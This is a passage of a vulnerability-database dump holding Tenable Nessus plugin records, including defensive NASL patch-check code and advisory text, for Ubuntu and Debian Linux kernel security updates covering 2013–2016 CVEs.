get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2929-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-83-generic\", pkgver:\"3.13.0-83.127\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-83-generic-lpae\", pkgver:\"3.13.0-83.127\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-83-lowlatency\", pkgver:\"3.13.0-83.127\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T14:53:20", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's translation lookaside buffer (TLB) handling of flush events. A local attacker could use this to cause a denial of service or possibly leak sensitive information. (CVE-2016-2069)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-vivid vulnerabilities (USN-2932-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2069", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2932-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2932-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89937);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2069\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n script_xref(name:\"USN\", value:\"2932-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-vivid vulnerabilities (USN-2932-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's\ntranslation lookaside buffer (TLB) handling of flush events. A local\nattacker could use this to cause a denial of service or possibly leak\nsensitive information. (CVE-2016-2069)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2932-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2069\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2932-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-56-generic\", pkgver:\"3.19.0-56.62~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-56-generic-lpae\", pkgver:\"3.19.0-56.62~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-56-lowlatency\", pkgver:\"3.19.0-56.62~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:04:16", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service, information leak or data loss.\n\n - CVE-2013-4312, CVE-2016-2847 Tetsuo Handa discovered that users can use pipes queued on local (Unix) sockets to allocate an unfair share of kernel memory, leading to denial-of-service (resource exhaustion).\n\n This issue was previously mitigated for the stable suite by limiting the total number of files queued by each user on local sockets. The new kernel version in both suites includes that mitigation plus limits on the total size of pipe buffers allocated for each user.\n\n - CVE-2015-7566 Ralf Spenneberg of OpenSource Security reported that the visor driver crashes when a specially crafted USB device without bulk-out endpoint is detected.\n\n - CVE-2015-8767 An SCTP denial-of-service was discovered which can be triggered by a local attacker during a heartbeat timeout event after the 4-way handshake.\n\n - CVE-2015-8785 It was discovered that local users permitted to write to a file on a FUSE filesystem could cause a denial of service (unkillable loop in the kernel).\n\n - CVE-2015-8812 A flaw was found in the iw_cxgb3 Infiniband driver.\n Whenever it could not send a packet because the network was congested, it would free the packet buffer but later attempt to send the packet again. This use-after-free could result in a denial of service (crash or hang), data loss or privilege escalation.\n\n - CVE-2015-8816 A use-after-free vulnerability was discovered in the USB hub driver. This may be used by a physically present user for privilege escalation.\n\n - CVE-2015-8830 Ben Hawkes of Google Project Zero reported that the AIO interface permitted reading or writing 2 GiB of data or more in a single chunk, which could lead to an integer overflow when applied to certain filesystems, socket or device types. The full security impact has not been evaluated.\n\n - CVE-2016-0723 A use-after-free vulnerability was discovered in the TIOCGETD ioctl. A local attacker could use this flaw for denial-of-service.\n\n - CVE-2016-0774 It was found that the fix for CVE-2015-1805 in kernel versions older than Linux 3.16 did not correctly handle the case of a partially failed atomic read. A local, unprivileged user could use this flaw to crash the system or leak kernel memory to user space.\n\n - CVE-2016-2069 Andy Lutomirski discovered a race condition in flushing of the TLB when switching tasks on an x86 system. On an SMP system this could possibly lead to a crash, information leak or privilege escalation.\n\n - CVE-2016-2384 Andrey Konovalov found that a crafted USB MIDI device with an invalid USB descriptor could trigger a double-free. This may be used by a physically present user for privilege escalation.\n\n - CVE-2016-2543 Dmitry Vyukov found that the core sound sequencer driver (snd-seq) lacked a necessary check for a NULL pointer, allowing a user with access to a sound sequencer device to cause a denial-of service (crash).\n\n - CVE-2016-2544, CVE-2016-2546, CVE-2016-2547, CVE-2016-2548\n\n Dmitry Vyukov found various race conditions in the sound subsystem (ALSA)'s management of timers. A user with access to sound devices could use these to cause a denial-of-service (crash or hang) or possibly for privilege escalation.\n\n - CVE-2016-2545 Dmitry Vyukov found a flaw in list manipulation in the sound subsystem (ALSA)'s management of timers. A user with access to sound devices could use this to cause a denial-of-service (crash or hang) or possibly for privilege escalation.\n\n - CVE-2016-2549 Dmitry Vyukov found a potential deadlock in the sound subsystem (ALSA)'s use of high resolution timers. A user with access to sound devices could use this to cause a denial-of-service (hang).\n\n - CVE-2016-2550 The original mitigation of CVE-2013-4312, limiting the total number of files a user could queue on local sockets, was flawed. A user given a local socket opened by another user, for example through the systemd socket activation mechanism, could make use of the other user's quota, again leading to a denial-of-service (resource exhaustion). This is fixed by accounting queued files to the sender rather than the socket opener.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Debian DSA-3503-1 : linux - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-1805", "CVE-2015-7566", "CVE-2015-8767", "CVE-2015-8785", "CVE-2015-8812", "CVE-2015-8816", "CVE-2015-8830", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2069", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3503.NASL", "href": "https://www.tenable.com/plugins/nessus/89122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3503. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89122);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2015-8830\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-2069\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"DSA\", value:\"3503\");\n\n script_name(english:\"Debian DSA-3503-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service, information\nleak or data loss.\n\n - CVE-2013-4312, CVE-2016-2847\n Tetsuo Handa discovered that users can use pipes queued\n on local (Unix) sockets to allocate an unfair share of\n kernel memory, leading to denial-of-service (resource\n exhaustion).\n\n This issue was previously mitigated for the stable suite by limiting\n the total number of files queued by each user on local sockets. The\n new kernel version in both suites includes that mitigation plus\n limits on the total size of pipe buffers allocated for each user.\n\n - CVE-2015-7566\n Ralf Spenneberg of OpenSource Security reported that the\n visor driver crashes when a specially crafted USB device\n without bulk-out endpoint is detected.\n\n - CVE-2015-8767\n An SCTP denial-of-service was discovered which can be\n triggered by a local attacker during a heartbeat timeout\n event after the 4-way handshake.\n\n - CVE-2015-8785\n It was discovered that local users permitted to write to\n a file on a FUSE filesystem could cause a denial of\n service (unkillable loop in the kernel).\n\n - CVE-2015-8812\n A flaw was found in the iw_cxgb3 Infiniband driver.\n Whenever it could not send a packet because the network\n was congested, it would free the packet buffer but later\n attempt to send the packet again. This use-after-free\n could result in a denial of service (crash or hang),\n data loss or privilege escalation.\n\n - CVE-2015-8816\n A use-after-free vulnerability was discovered in the USB\n hub driver. This may be used by a physically present\n user for privilege escalation.\n\n - CVE-2015-8830\n Ben Hawkes of Google Project Zero reported that the AIO\n interface permitted reading or writing 2 GiB of data or\n more in a single chunk, which could lead to an integer\n overflow when applied to certain filesystems, socket or\n device types. The full security impact has not been\n evaluated.\n\n - CVE-2016-0723\n A use-after-free vulnerability was discovered in the\n TIOCGETD ioctl. A local attacker could use this flaw for\n denial-of-service.\n\n - CVE-2016-0774\n It was found that the fix for CVE-2015-1805 in kernel\n versions older than Linux 3.16 did not correctly handle\n the case of a partially failed atomic read. A local,\n unprivileged user could use this flaw to crash the\n system or leak kernel memory to user space.\n\n - CVE-2016-2069\n Andy Lutomirski discovered a race condition in flushing\n of the TLB when switching tasks on an x86 system. On an\n SMP system this could possibly lead to a crash,\n information leak or privilege escalation.\n\n - CVE-2016-2384\n Andrey Konovalov found that a crafted USB MIDI device\n with an invalid USB descriptor could trigger a\n double-free. This may be used by a physically present\n user for privilege escalation.\n\n - CVE-2016-2543\n Dmitry Vyukov found that the core sound sequencer driver\n (snd-seq) lacked a necessary check for a NULL pointer,\n allowing a user with access to a sound sequencer device\n to cause a denial-of service (crash).\n\n - CVE-2016-2544, CVE-2016-2546, CVE-2016-2547,\n CVE-2016-2548\n\n Dmitry Vyukov found various race conditions in the sound\n subsystem (ALSA)'s management of timers. A user with\n access to sound devices could use these to cause a\n denial-of-service (crash or hang) or possibly for\n privilege escalation.\n\n - CVE-2016-2545\n Dmitry Vyukov found a flaw in list manipulation in the\n sound subsystem (ALSA)'s management of timers. A user\n with access to sound devices could use this to cause a\n denial-of-service (crash or hang) or possibly for\n privilege escalation.\n\n - CVE-2016-2549\n Dmitry Vyukov found a potential deadlock in the sound\n subsystem (ALSA)'s use of high resolution timers. A user\n with access to sound devices could use this to cause a\n denial-of-service (hang).\n\n - CVE-2016-2550\n The original mitigation of CVE-2013-4312, limiting the\n total number of files a user could queue on local\n sockets, was flawed. A user given a local socket opened\n by another user, for example through the systemd socket\n activation mechanism, could make use of the other user's\n quota, again leading to a denial-of-service (resource\n exhaustion). This is fixed by accounting queued files to\n the sender rather than the socket opener.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-7566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0723\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2069\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2544\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2550\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-7566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0723\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3503\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the oldstable distribution (wheezy), these problems have been\nfixed in version 3.2.73-2+deb7u3. The oldstable distribution (wheezy)\nis not affected by CVE-2015-8830.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 3.16.7-ckt20-1+deb8u4. CVE-2013-4312, CVE-2015-7566,\nCVE-2015-8767 and CVE-2016-0723 were already fixed in DSA-3448-1.\nCVE-2016-0774 does not affect the stable distribution.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", 